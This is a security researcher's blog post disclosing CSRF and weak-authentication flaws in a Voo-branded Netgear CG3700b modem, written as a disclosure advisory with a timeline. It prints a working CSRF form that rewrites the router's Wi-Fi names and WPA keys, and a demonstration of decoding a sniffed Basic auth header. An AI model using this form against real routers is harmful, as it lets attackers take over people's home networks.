Address
304 North Cardinal St.
Dorchester Center, MA 02124

Work Hours
Monday to Friday: 7AM - 7PM
Weekend: 10AM - 5PM

Voo branded Netgear CG3700b Vulnerabilities

Just before I left for America, I found a few Netgear CG3700b vulnerabilities in my Voo branded modem.

Voo branded Netgear CG3700b Vulnerabilities – Introduction

As the 90 days have passed since disclosing it to the vendor (see timeline below), it was time for me to publicly disclose my findings and payloads.

CVEs are still pending, but I will add them to this post when I receive them.

Cross-Site Request Forgery (CSRF) on all form POSTs

The Voo branded Netgear CG3700b custom firmware (newest version, V2.02.03) allows a (context-dependent) attacker to perform a Cross-Site Request Forgery (CSRF) attack on all configuration setting (/goform/) page POST requests. By tricking a user into following a specially crafted link, an attacker can modify all settings including WEP/WPA/WPA2 keys, restore the router to factory settings, or even upload an entire malicious configuration file.

Before settings:

Netgear CG3700b Vulnerabilities - Before CSRF

Example CSRF form:

<form method="POST" name="form0" action="http://192.168.0.1/goform/index"
<input type="hidden" name="group_parametrage_wifi" value="active">
<input type="hidden" name="reseau_wifi_name" value="NEWSSID">
<input type="hidden" name="nom_select" value="AUTO-PSK">
<input type="hidden" name="canal" value=0>
<input type="hidden" name="mot_de_passe" value="NEWWPAKEY">
<input type="hidden" name="NBandwidth" value=20>
<input type="hidden" name="group_parametrage_wifi_an" value="active">
<input type="hidden" name="reseau_wifi_name_an" value="NEWSSID-5G">
<input type="hidden" name="nom_select_an" value="AUTO-PSK">
<input type="hidden" name="canal_an" value=0>
<input type="hidden" name="mot_de_passe_an" value="NEWWPAKEY-5G">
<input type="hidden" name="NBandwidth_an" value=20>
<input type="hidden" name="group_fon" value="desactiver">
<input type="hidden" name="buttonApply" value=1>
<input type="hidden" name="only_mode" value=0>
<input type="hidden" name="selected_ch_an" value=1>
</form>

After CSRF:

Netgear CG3700b Vulnerabilities - After CSRF

Insufficient Authentication (OWASP-A2)

This same modem handles authentication via basic authentication over the default (HTTP, non-ssl) connection. This allows an attacker to easily decode the base64 encoded username and password, and authenticate to the router. This only requires an attacker be on the same network as the router, and sniff the clear-text traffic.

Example:

POST http://192.168.0.1/goform/parametre_config HTTP/1.1
Host: 192.168.0.1
Connection: keep-alive
Content-Length: 24721
Cache-Control: max-age=0
Authorization: Basic dm9vOlBBU1NXT1JE

Screenshot:

Netgear CG3700b Vulnerabilities - Basic Auth

root@kali:~# cat voo.txt 
dm9vOlBBU1NXT1JE
root@kali:~# base64 --decode voo.txt 
voo:PASSWORD

Insufficient Authentication (OWASP-A2)

The Voo Netgear CG3700b also uses the same key for authentication to the administrative console as well as to the wireless by default.

If a WPA2 flaw were to be found that made cracking it simple, the HTTP basic authentication was brute forced (known charset of A-Z and 8 characters), or some other vulnerability found, then this would cause both systems to fail instead of just one.

Disclosure Timeline

  • 2016-01-22 – Discovered vulnerability, initially notified vendor.
  • 2016-01-23 – Requested CVE.
  • 2016-03-07 – Contacted vendor again, they notified me that they will not fix these issues at this time.
  • 2016-04-20 – Attempted to contact Mitre again to receive CVE.
  • 2016-04-21 – Sent to Full Disclosure.
  • 2016-04-23 – Additional information and full disclosure published here.
  • 2016-04-26 – Resent to Full Disclosure due to some errors.
  • 2019-06-20 – Requested CVEs again with the new form.

Voo branded Netgear CG3700b Vulnerabilities – Conclusion

All in all, a fun weekend, and a few good findings.

The vendor has not gotten back to me regarding a patch for these issues, but I know that some of their other offerings are allegedly less vulnerable.

I will add any additional information to this post as necessary, but you can find the FullDisclosure report here.

8 Comments

  1. Hello,
    I read “2019-06-20 – Requested CVEs again with the new form.”
    Do you know if the vulnerabilities are still present in V2.03.03? It has been deployed approximately in 2017 by VOO (i.e. about one year after your report about 2.02.x). See e.g. https://forum.voo.be/ma-connexion-internet-17/interface-du-modem-netgear-bug-7852#post69290
    I have access to one such upgraded device if you like. (I mean you may or not still live in Belgium.)
    Thank you for your investigation and blog post
    Regards
    O.

    • I’m actually not sure, as I moved away from Belgium!

      That said, it should be easy enough to see if they still exist, based on this post alone.

      If you have any questions or information, then please let me know.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.